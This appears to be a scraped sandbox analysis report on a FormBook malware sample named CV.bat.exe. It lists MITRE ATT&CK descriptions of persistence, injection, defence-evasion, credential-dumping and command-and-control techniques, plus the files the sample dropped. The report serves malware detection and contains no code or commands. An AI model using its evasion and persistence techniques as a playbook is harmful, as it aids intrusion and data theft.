Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CV.bat.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Sigma Signatures

Persistence and Installation Behavior

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CV.bat.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m0l2oodl.mld.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rejx5zel.xcw.psm1

C:\Users\user\AppData\Local\Temp\f-0386u9

C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
CV.bat.exe

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre